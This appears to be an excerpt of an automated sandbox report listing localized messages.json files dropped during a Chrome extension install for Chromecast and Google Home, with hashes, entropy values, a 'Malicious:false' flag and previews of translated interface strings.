                                                                                                                                                                SSDEEP:192:+esprzAsQp68wIJYkMyr2k0jR1/7Rr1uV6c8TEKdl:Gr78JDMyrR0tJuV6uml
                                                                                                                                                                MD5:59483AD798347B291363327D446FA107
                                                                                                                                                                SHA1:C069F29BB68FA7BA2631B0BF5BBF313346AC6736
                                                                                                                                                                SHA-256:DD47530EAE96346CD4DC3267A0BB1091BB17B704803A93CDA2E3E81551B94F12
                                                                                                                                                                SHA-512:091595CA135E965ED3DE376873541117F0E7A8EBDEB4714833EFDD6C820234373891BE5DEC437BA85CCB79CCCA053D407E6ADA17EBDAE7D313324A48775C0010
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Hindi gumagalaw".. },.. "1213957982723875920": {.. "message": "Alin sa sumusunod ang pinakamahusay na naglalarawan sa iyong network?".. },.. "128276876460319075": {.. "message": "Pagtuklas ng Device".. },.. "1428448869078126731": {.. "message": "Pagka-smooth ng Video".. },.. "1522140683318860351": {.. "message": "Hindi nakakonekta. Pakisubukang muli.".. },.. "1550904064710828958": {.. "message": "Smooth".. },.. "1636686747687494376": {.. "message": "Perpekto".. },.. "1802762746589457177": {.. "message": "Volume".. },.. "1850397500312020388": {.. "message": "Nakikita mo ba ang iyong Chromecast sa $START_LINK$ Google Home app$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\fr\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15826
                                                                                                                                                                Entropy (8bit):5.277877116547859
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:nLZprAZg3EkV3sjrICe8L/1Va7lt1rlxLAkoYHHavV6c8TEKdl:vrW+2jrI7TdLAk3MV6uml
                                                                                                                                                                MD5:9B416146FE4F1403C2AACAC4DCF1A5C3
                                                                                                                                                                SHA1:616F055C9FAD4CE972DF82EC8A9B2F4EDA3E7FAD
                                                                                                                                                                SHA-256:7C7F5758F54008190ACCDDBD1761CBD980FB5FE0847E992874498228D2571DBC
                                                                                                                                                                SHA-512:6E8E70380A8C6E2C0587ADFF6AE36963EC76694904841CE1DFE4EEE215B917AD3E8AF727555627FBDF6B8BA6A4A0674D2B90AC4E9331B6628A32F4C4348FB51B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Se fige".. },.. "1213957982723875920": {.. "message": "Parmi les propositions suivantes, laquelle d.crit le mieux votre r.seau.?".. },.. "128276876460319075": {.. "message": "D.tection d'appareils".. },.. "1428448869078126731": {.. "message": "Fluidit. de la vid.o".. },.. "1522140683318860351": {.. "message": ".chec de la connexion. Veuillez r.essayer.".. },.. "1550904064710828958": {.. "message": "Fluide".. },.. "1636686747687494376": {.. "message": "Parfaite".. },.. "1802762746589457177": {.. "message": "Volume".. },.. "1850397500312020388": {.. "message": "Votre Chromecast est-il visible dans l'$START_LINK$application Google.Home$END_LINK$.? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\gu\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):19260
                                                                                                                                                                Entropy (8bit):5.326067910239208
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:Hq2Mr+qPlJKYMdzKgXr3dGsUF+yAK37Wf7Cy/V6uml:KxzTVgX1ykj6uml
                                                                                                                                                                MD5:8AD20A0A87D839F400C102DED115A861
                                                                                                                                                                SHA1:C3B241388F2EB78A8F76117C045BD2A29E10E142
                                                                                                                                                                SHA-256:2389976FC141F5FCC592E84D2D2D7D1E05DC0818F8324AD3FB97910F629BC591
                                                                                                                                                                SHA-512:0B0F53EC1B8ACF26E4CFA0E27E759D09648FD19E06F067B2D8E7056319F6799A161B137A4327D01150502E78C0DC9991A5443E015F2ADB9BADADF86E35AB76B3
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": ".....".. },.. "1213957982723875920": {.. "message": "........... .... ..... .......... ....... ..... ... ..?".. },.. "128276876460319075": {.. "message": "..... ...".. },.. "1428448869078126731": {.. "message": "........ ......".. },.. "1522140683318860351": {.. "message": "....... ...... ..... .... ..... ..... ...... ....".. },.. "1550904064710828958": {.. "message": "....".. },.. "1636686747687494376": {.. "message": ".....".. },.. "1802762746589457177": {.. "message": ".......".. },.. "1850397500312020388": {.. "message": "... ... $START_LINK$ Google Home ..$END_LINK$... Chromecast..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\hi\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):19387
                                                                                                                                                                Entropy (8bit):5.329218714975947
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:zrGrSmhKy7KyY+bNEDElQdrMEPxtShJV6uml:zBqGUQdwEPrW6uml
                                                                                                                                                                MD5:C64C74B256C0BE49022EC3A97FBC2498
                                                                                                                                                                SHA1:ECBEAA704609841242A5B8ED5EAA5816C1A3D978
                                                                                                                                                                SHA-256:57AF2C95207DCF094DFA6236B6CBA9B091088AA4DD92A095149315A898D3BCED
                                                                                                                                                                SHA-512:1117B6073A5AFF0007AB0B75DEFE7560A4A42795027C50ED4B346988BB4FD19344F22AD347EB1A49556928571066E32DE0AC7EC66D0E367817A22E30503D09D0
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": ".....".. },.. "1213957982723875920": {.. "message": "..... ... .. ... .... ....... .. .... ..... ..... .... ..?".. },.. "128276876460319075": {.. "message": "...... ...".. },.. "1428448869078126731": {.. "message": "...... .........".. },.. "1522140683318860351": {.. "message": "....... ..... ..... .... ...... .....".. },.. "1550904064710828958": {.. "message": ".......".. },.. "1636686747687494376": {.. "message": ".....".. },.. "1802762746589457177": {.. "message": ".....".. },.. "1850397500312020388": {.. "message": ".... .. $START_LINK$ Google Home .........$END_LINK$ ... .... Ch
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\hr\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15503
                                                                                                                                                                Entropy (8bit):5.29020775977578
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:Pdapr6h85tRwVQgkvJryLkla5Kfndg6V6c8TEKdl:Arwot2Q7BryVce6V6uml
                                                                                                                                                                MD5:E4C43BBDDA7ED7A09B811914827019F7
                                                                                                                                                                SHA1:F5699E4BBBBFA126B9102084D00C5C771B5F1EB6
                                                                                                                                                                SHA-256:69254040E0E05228905AD04C9C8F3ED885FDE566752A1B006C8D87928E43F10C
                                                                                                                                                                SHA-512:C7853C54E803EAAE23B153F6BDD76CC4B230B21D5C51CD453BE7A5CE53E51B9F655918AB0D9383D66F8BF9429636485DC46FF74B919ED36C3D28CC448EA10EE5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Zamrzavanje".. },.. "1213957982723875920": {.. "message": "Koje od sljede.eg najbolje opisuje va.u mre.u?".. },.. "128276876460319075": {.. "message": "Otkrivanje ure.aja".. },.. "1428448869078126731": {.. "message": "Ujedna.enost videoreprodukcije".. },.. "1522140683318860351": {.. "message": "Povezivanje nije uspjelo. Poku.ajte ponovo.".. },.. "1550904064710828958": {.. "message": "Glatko".. },.. "1636686747687494376": {.. "message": "Savr.ena".. },.. "1802762746589457177": {.. "message": "Glasno.a".. },.. "1850397500312020388": {.. "message": "Vidite li svoj Chromecast u $START_LINK$aplikaciji Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3"..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\hu\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15682
                                                                                                                                                                Entropy (8bit):5.354505633120392
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:CCEAproS9fZv+JwkDMrC2NSxoSgbV6c8TEKdl:5r5VZv+RDMrazoV6uml
                                                                                                                                                                MD5:8E9FF7E49473C5734A2F6F0812E12EB3
                                                                                                                                                                SHA1:A4F10DDD1580582533D5EB59EDF6D8048F887C81
                                                                                                                                                                SHA-256:6CDD2FB39ADECE00E88B989E464B05ED1414092D0492F6D0AE58D549BFD1A46A
                                                                                                                                                                SHA-512:E9A4AF31B1A276F395599BB620A3164CABF3459F3C102DD3F57DFEA734510BD985DE65CB409E1975559ACCC615075439A08E1DEBE22C90A0ABCAA3CAFEE79AC7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Lefagy".. },.. "1213957982723875920": {.. "message": "Az al.bbiak k.z.l melyik jellemzi legjobban h.l.zat.t?".. },.. "128276876460319075": {.. "message": "Eszk.zfelfedez.s".. },.. "1428448869078126731": {.. "message": "Vide. folyamatoss.ga".. },.. "1522140683318860351": {.. "message": "Sikertelen kapcsol.d.s. K.rj.k, pr.b.lja .jra.".. },.. "1550904064710828958": {.. "message": "Folyamatos".. },.. "1636686747687494376": {.. "message": "T.k.letes".. },.. "1802762746589457177": {.. "message": "Hanger.".. },.. "1850397500312020388": {.. "message": "L.tja a Chromecastot a $START_LINK$Google Home alkalmaz.sban$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content":
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\id\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15070
                                                                                                                                                                Entropy (8bit):5.190057470347349
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:GsprMtChjkWfrEWL0KRCnEOWV6c8TEKdl:9rtAEr3LTRuWV6uml
                                                                                                                                                                MD5:7ADF9F2048944821F93879336EB61A78
                                                                                                                                                                SHA1:C3DA74FB544684D5B250767BB0CB66FFB7C58963
                                                                                                                                                                SHA-256:3630947E1075E3663AD3E4824D0BE42CB47C0D615D8053E83B9595047C8BA9BE
                                                                                                                                                                SHA-512:1F28BB80E1839C5581106BEA3AE2501C7618249D7E3115819F5A9A87771D59F5DE346C1B9C87F7FFC390604D5B9888CE738E25F2F04A094002A0FB3B22CBEC95
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Membeku".. },.. "1213957982723875920": {.. "message": "Dari berikut ini, manakah yang paling mendeskripsikan jaringan Anda?".. },.. "128276876460319075": {.. "message": "Penemuan Perangkat".. },.. "1428448869078126731": {.. "message": "Kelancaran Video".. },.. "1522140683318860351": {.. "message": "Sambungan gagal. Coba lagi.".. },.. "1550904064710828958": {.. "message": "Lancar".. },.. "1636686747687494376": {.. "message": "Sempurna".. },.. "1802762746589457177": {.. "message": "Volume".. },.. "1850397500312020388": {.. "message": "Bisakah Anda melihat Chromecast di $START_LINK$aplikasi Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\it\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15256
                                                                                                                                                                Entropy (8bit):5.210663765771143
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:lYprk52dAaykVza8rE0QWBKD9+vq0hKEV6c8TEKdl:qrlA8r6DalV6uml
                                                                                                                                                                MD5:BB3041A2B485B900F623E57459AE698A
                                                                                                                                                                SHA1:502F5EA89F9FB0287E864B240EA39889D72053A4
                                                                                                                                                                SHA-256:025737EF8FA06706B3F26D0F52B4844244A6D33DAE1D82FEF2931A14C003D57E
                                                                                                                                                                SHA-512:BA51784073BEF82F3A116B33DA406FDB10EC823B9EE74375C46036DAD8BDCB4141F60845DE141ABE42CEEF9251572F6AB287CA5FC7669C60E4F68071D5AB8C2D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Si blocca".. },.. "1213957982723875920": {.. "message": "Quale delle seguenti definizioni descrive meglio la tua rete?".. },.. "128276876460319075": {.. "message": "Rilevamento dispositivi".. },.. "1428448869078126731": {.. "message": "Uniformit. video".. },.. "1522140683318860351": {.. "message": "Connessione non riuscita. Riprova.".. },.. "1550904064710828958": {.. "message": "Fluido".. },.. "1636686747687494376": {.. "message": "Perfetta".. },.. "1802762746589457177": {.. "message": "Volume".. },.. "1850397500312020388": {.. "message": "Riesci a vedere il tuo dispositivo Chromecast nell'$START_LINK$app Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3"..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\iw\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):18990
                                                                                                                                                                Entropy (8bit):4.903564947699091
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:xkQ0XrEGOhGUkT/Mf8eZrNj27tS+iiUfOkGEyWiycLSK8eL+D75J4X:KdrgGvDMEeZrM78fQVLZqDA
                                                                                                                                                                MD5:A991BEF47A83913A1E0EF06007D09198
                                                                                                                                                                SHA1:80BA1E8FC3E9BE8A34F73E78CED8313E54F9CC96
                                                                                                                                                                SHA-256:0F95D8BF550F14B2B704CE42911F5BD23FA9FE28D0D301F66628848B27C760CB
                                                                                                                                                                SHA-512:1B5C8196669088A884FD8E117E7EB0870B296AF493004F948D0AD4FF630B07A34F423647E55856307029B2B06CDCCEAED2F9C43B426200D28D8A19A48CEA5D42
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\ja\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):16519
                                                                                                                                                                Entropy (8bit):5.675556017051063
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:nkprPhQdxkRWrZe1wYpMR5wnAV6c8TEKdl:YrLRWri65wAV6uml
                                                                                                                                                                MD5:6F2CC1A6B258DF45F519BA24149FABDC
                                                                                                                                                                SHA1:8A58C7880C6D22765DCBB6BCE22A192C1B109AE1
                                                                                                                                                                SHA-256:42ECFEE727CFC4F2845FEFDACE5EDC2E0A40AFAD69973A3B950CE653A7633342
                                                                                                                                                                SHA-512:F7454F0E14301C59CC54361ACC0A1C6D072EF9BDF5DEA60646FB90B1CE47612785938C784A4CF1DE3E62648A14420374933B5F5DA43907BC00D3799FF163A3D0
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\kn\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):20406
                                                                                                                                                                Entropy (8bit):5.312117131662377
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:a6C5rBSzvrZreGnla9ZBHRUDYr9yRwEcAa4rSeD5BSz0hJz8qbbM3gbr//Hkr44c:a6C5rBSzvFreGnla9ZBHRUDYr9yRwEcC
                                                                                                                                                                MD5:2E3239FC277287810BC88D93A6691B09
                                                                                                                                                                SHA1:FC5D585DA00ADC90BF79109C7377BD55E6653569
                                                                                                                                                                SHA-256:5FC705AD19761204D8604EA069936A23731B055D51E7836CAAF16AC7719FBEEA
                                                                                                                                                                SHA-512:DF8BC9E577D3ECB0E6C303E1D2C9E9A4A8317CAE810A9DFC88D91B373A4B665722C5A9AB5A589BB947FDA4C7CD9A6DF39DDD13EA47FE9EFF7E0AC43E49FF3479
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\ko\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15480
                                                                                                                                                                Entropy (8bit):5.617756574352461
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:kWprGvSQtkxWffrnl5JuFBWVZV6c8TEKdl:TrkuxKfrlT4YVZV6uml
                                                                                                                                                                MD5:E303CD63AD00EB3154431DED78E871C4
                                                                                                                                                                SHA1:3B1E5B8E2CF5EBDF5D33656EF80A46563F751783
                                                                                                                                                                SHA-256:FDE602BFDB1AFD282682DA5338C4F91D8A2F6CB5411DB8F62F4583D629CE67A6
                                                                                                                                                                SHA-512:18BA1D5A25FBC1829AD957A531B0CC490AFCBD20AC22181021363AA3CFB916270B8732E824463C9B0897220E8AE86EB1BE561D6540E6C625F08F228F61DDFFA3
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\lt\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15802
                                                                                                                                                                Entropy (8bit):5.354550839818046
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:lGxSprfkiRR+2zJckS1khrnPI85+80p3DWReV6c8TEKdl:lG4rlq0OkSmhrwbpIeV6uml
                                                                                                                                                                MD5:93BBBE82F024FBCB7FB18E203F253429
                                                                                                                                                                SHA1:83F4D80F64FA2ADCE6C515C5F663BD38A76C51DB
                                                                                                                                                                SHA-256:E7A8570922CCC4F2CA3721C4E61F426158C4E7BC90274FBC8BE4040FF8B6CA9B
                                                                                                                                                                SHA-512:B7E7878106B466CE95069141DF1DE387E847348B62E9C4D548006452F3E164B3AD842E9673A56DC011A5ECC3346B5863E2034EE477A9D1F3E0ABD76B2D0F640A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Stringa".. },.. "1213957982723875920": {.. "message": "Kuris i. toliau pateikt. teigini. geriausiai apib.dina j.s. tinkl.?".. },.. "128276876460319075": {.. "message": ".renginio suradimas".. },.. "1428448869078126731": {.. "message": "Vaizdo .ra.o sklandumas".. },.. "1522140683318860351": {.. "message": ".vyko ry.io klaida. Bandykite dar kart..".. },.. "1550904064710828958": {.. "message": "Leid.iama skland.iai".. },.. "1636686747687494376": {.. "message": "Puiki".. },.. "1802762746589457177": {.. "message": "Garsumas".. },.. "1850397500312020388": {.. "message": "Ar .Chromecast. rodomas $START_LINK$programoje .Google Home.$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\lv\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15891
                                                                                                                                                                Entropy (8bit):5.36794040601742
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:y18prUkm15wkLDG2raqhnZDuvyI762V6c8TEKdl:RrAL7rte62V6uml
                                                                                                                                                                MD5:388590CE5E144AE5467FD6585073BD11
                                                                                                                                                                SHA1:61228673A400A98D5834389C06127589F19D3A30
                                                                                                                                                                SHA-256:05CA14196CA5D90B228C0F03684E03EBE403A3E7B513AE0A059244AE12B51164
                                                                                                                                                                SHA-512:BF83AC90BC56CEB1CA12DCB47BCE542FB8CFE0BC14E34DE4FE1A84F7CDB4B54E36C125CEA7EE06EA6244F7795A0957A8A20DB30CA4C60FC6E96EF2A735448521
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": ".Iesald.ts. att.ls".. },.. "1213957982723875920": {.. "message": "Kur. no t.l.k min.tajiem apgalvojumiem vislab.k raksturo j.su t.klu?".. },.. "128276876460319075": {.. "message": "Ier.ces atra.ana".. },.. "1428448869078126731": {.. "message": "Video vienm.r.ba".. },.. "1522140683318860351": {.. "message": "Neizdev.s izveidot savienojumu. L.dzu, m..iniet v.lreiz.".. },.. "1550904064710828958": {.. "message": "Vienm.r.gs att.ls".. },.. "1636686747687494376": {.. "message": "Nevainojama".. },.. "1802762746589457177": {.. "message": "Ska.ums".. },.. "1850397500312020388": {.. "message": "Vai j.su Chromecast ier.ce ir redzama $START_LINK$lietotn. Google.Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2"..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\ml\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):20995
                                                                                                                                                                Entropy (8bit):5.346788032166745
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:6pQrdbhWHZTwOn1HbxytQdroExFVRnTPV6uml:X5/Utz6uml
                                                                                                                                                                MD5:0CBE2A5C0798516F665F06BC46373B6D
                                                                                                                                                                SHA1:12AE7DDF4BA59B0324DE1E2EA10BBDCEC1495753
                                                                                                                                                                SHA-256:41179A3582BE3DE2CB8A569AF22EC97AF2A42403D75E250BCAE853DBF7DDE598
                                                                                                                                                                SHA-512:72B4B8E24152569AAF582115FAF7DE83ED51DC796AB5BEBA27F1BE4B0520F1280A4EDFDAB13DD9AA2B144B4E52A2F920162C6B34F738802AEA9458C141C2ADA4
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\mr\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):19625
                                                                                                                                                                Entropy (8bit):5.311040089989635
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:PbrpprGy+RmIhTmidpzlF1Akk03LQYOkQrjNjP8hZYiEQ5z+excV6c8TEKdl:PbfrGUIh7dpzxbP7KrjNjaBEYuV6uml
                                                                                                                                                                MD5:E4D38794005291B3AB72389F7C959E8C
                                                                                                                                                                SHA1:D19AAAAC79EF703FFE78371B44D9F3681414E1EA
                                                                                                                                                                SHA-256:915D323B9F7DB9E13BD50A75426B750C93EBC8699C523E72A37CB818CC33292B
                                                                                                                                                                SHA-512:F1C502582D581C088F06E95309CBD5125D6E0EA3EE0AB82DB561AAC91A9E52B361FBFD93B63BF7A73026FEDC76B8B77483AA6AD1A54760DC20496F8666897E98
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\ms\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15330
                                                                                                                                                                Entropy (8bit):5.193447909498091
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:rCprBbx+Fkc4kYPr/pEt4EpXlIoV6c8TEKdl:CrYjer/mOE4oV6uml
                                                                                                                                                                MD5:09D75141E0D80FBD3E9E92CE843DA986
                                                                                                                                                                SHA1:B24EAB4B1242C31B69514D77BC1DB36A3F648F40
                                                                                                                                                                SHA-256:8F1DBDEFD910AD88BEEC7956619CDB34391D6E69254C3A7497E8F87134AE8B5C
                                                                                                                                                                SHA-512:935C69481F1555787FCB9A5490B3188B348284B600359239742A7D802ADD5CC8A30CC1F0942D52E620DFB388787FCD69B548BBAC590110245DF5763367A2DD5A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Tidak bergerak".. },.. "1213957982723875920": {.. "message": "Antara yang berikut, manakah yang terbaik menggambarkan rangkaian anda?".. },.. "128276876460319075": {.. "message": "Penemuan Peranti".. },.. "1428448869078126731": {.. "message": "Kelancaran Video".. },.. "1522140683318860351": {.. "message": "Sambungan gagal. Sila cuba lagi.".. },.. "1550904064710828958": {.. "message": "Lancar".. },.. "1636686747687494376": {.. "message": "Sempurna".. },.. "1802762746589457177": {.. "message": "Kelantangan".. },.. "1850397500312020388": {.. "message": "Adakah anda dapat melihat Chromecast anda dalam $START_LINK$ apl Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content":
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\nb\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):12194
                                                                                                                                                                Entropy (8bit):5.525086072392163
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:xQQBkrB6Ju6kGBZZr2qP8lH42j6iycLSK8eL+D75J4X:uQqr8JuRGBZZr2O8N42FVLZqDA
                                                                                                                                                                MD5:BE6ED6423922FF31CE36E252A7BD2F34
                                                                                                                                                                SHA1:D53EF8B86FA638FFD9D0AB16DA586853075E8C2B
                                                                                                                                                                SHA-256:564476EF8631ED4694EDE12D8552A5A3D8D660C9085BD4EC4FC45514D3805B2C
                                                                                                                                                                SHA-512:07D58204D26E88DD3100BFAE4B63522766EE487ED60BD0F2288B572C6F5366D5D3E1EA3D87CEF3D6EED5FF6FD508A1F2619C75233C399D250FC1D982AE4342D3
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
